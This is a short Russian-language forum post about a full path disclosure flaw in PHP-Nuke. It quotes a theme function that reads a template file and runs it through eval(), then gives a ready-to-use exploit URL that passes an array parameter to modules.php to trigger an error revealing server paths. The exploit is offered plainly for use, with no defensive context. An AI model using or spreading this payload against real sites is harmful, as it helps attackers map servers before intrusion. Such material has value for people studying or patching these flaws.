Показать сообщение отдельно
Старый 26.12.2010, 12:33   #17
AFoST
 
Аватар для AFoST
 
Регистрация: 01.08.2010
Сообщений: 79
Репутация: 43
По умолчанию

раскрытие путей

Z:\home\phpnuke\www\includes\core\theme_normal.php
PHP код:
function thememanualbox($title$content) {
    global 
$ThemeSel;
    if ((
$blocktemplate == "")) {
        
$blocktemplate "default.html";    
    }
    echo 
$blocktemplate;
    
$tmpl_file "themes/".$ThemeSel."/blocks+/$blocktemplate";
    
$thefile implode(""file($tmpl_file));
    
$thefile addslashes($thefile);
    
$thefile "\$r_file=\"".$thefile."\";";
    eval(
$thefile);
    print 
$r_file;

exploit:
Код HTML:
http://phpnuke/modules.php?name=Cat_all&file[]=
AFoST вне форума   Ответить с цитированием